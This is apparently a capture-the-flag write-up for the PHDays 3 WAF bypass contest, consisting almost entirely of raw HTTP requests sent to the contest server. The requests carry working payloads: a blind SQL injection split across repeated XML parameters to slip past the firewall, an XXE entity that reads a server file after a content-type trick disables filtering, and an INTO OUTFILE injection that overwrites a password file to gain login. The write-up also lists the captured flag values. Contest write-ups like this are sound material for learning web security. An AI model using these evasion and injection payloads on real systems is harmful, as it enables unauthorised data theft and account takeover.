= PHDays 3 WAF bypass contest== Stage 1.Blind SQLi, use multiple params with

1. = PHDays 3 WAF bypass contest
2. == Stage 1.
3. Blind SQLi, use multiple params with the same name to bypass WAF:
4. POST /api/ HTTP/1.1
5. Host: 62.148.7.178
6. Content-Length: 1985
7. Referer: http://62.148.7.178/
8. Content-Type: application/x-www-form-urlencoded; charset=UTF-8
9. Accept-Encoding: *
10. User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:21.0) Gecko/20100101
11. Firefox/21.0
12.  
13. <?xml version="1.0"?><request><search_name>
14. </search_name><search_name>Kn</search_name><search_name>ig</search_name><search_name>ht</search_name><search_name>
15. '</search_name><search_name>
16. a</search_name><search_name>nd</search_name><search_name>
17. (</search_name><search_name>or</search_name><search_name>d(</search_name><search_name>su</search_name><search_name>bs</search_name><search_name>tr</search_name><search_name>in</search_name><search_name>g(</search_name><search_name>(s</search_name><search_name>el</search_name><search_name>ec</search_name><search_name>t
18. </search_name><search_name>fl</search_name><search_name>ag</search_name><search_name>
19. f</search_name><search_name>ro</search_name><search_name>m
20. </search_name><search_name>se</search_name><search_name>cr</search_name><search_name>et</search_name><search_name>_t</search_name><search_name>bl</search_name><search_name>
21. w</search_name><search_name>he</search_name><search_name>re</search_name><search_name>
22. f</search_name><search_name>la</search_name><search_name>g
23. </search_name><search_name>=
24. </search_name><search_name>'3</search_name><search_name>06</search_name><search_name>6d</search_name><search_name>7f</search_name><search_name>69</search_name><search_name>d7</search_name><search_name>98</search_name><search_name>70</search_name><search_name>06</search_name><search_name>8f</search_name><search_name>ae</search_name><search_name>85</search_name><search_name>21</search_name><search_name>c0</search_name><search_name>61</search_name><search_name>4b</search_name><search_name>2'</search_name><search_name>
25. l</search_name><search_name>im</search_name><search_name>it</search_name><search_name>
26. 0</search_name><search_name>,1</search_name><search_name>),</search_name><search_name>1,</search_name><search_name>1)</search_name><search_name>)&gt;</search_name><search_name>
27. 4</search_name><search_name>9 </search_name><search_name>)
28. </search_name><search_name>--</search_name><search_name>
29. a</search_name></request>
30.  
31. Flag #1, mysql database test, table secret_tbl, column flag:
32. 3066d7f69d79870068fae8521c0614b2
33. The second column contains the string /var/lib/sepolgen/1241232eerwqwa/asfgasddddd11111/flag
34. == Flag 2
35. Notice the content-type trick that turned WAF off
36. POST /api/ HTTP/1.1
37. Host: 62.148.7.178
38. Content-Length: 176
39. Referer: http://62.148.7.178/
40. Content-Type: multipart/whatever; charset=EUC-JP
41. Accept-Encoding: *
42. User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:21.0) Gecko/20100101
43. Firefox/21.0
44.  
45. <?xml version="1.0" standalone="no"?><!DOCTYPE x [<!ENTITY e SYSTEM
46. '/var/lib/sepolgen/1241232eerwqwa/asfgasddddd11111/flag'>]><request><search_name>&e;</search_name></request>
47. == Flag 3
48. 494bf6673d0f0b8fafac5b637de9a70d
49. Rewrite htpasswd file via sqli, log in as winer, grab the flag
50. POST /api/ HTTP/1.1
51. Host: 62.148.7.178
52. Content-Length: 172
53. Referer: http://62.148.7.178/
54. Content-Type: asdsadsa; charset=EUC-JP
55. Accept-Encoding: *
56. User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:21.0) Gecko/20100101
57. Firefox/21.0
58.  
59. <?xml version="1.0" standalone="no"?><request><search_name>asd' UNION
60. select 'admin:XfOn8YD6hQ.NU' into outfile
61. '/var/www/thirdstage/winnerpwd' -- a</search_name></request>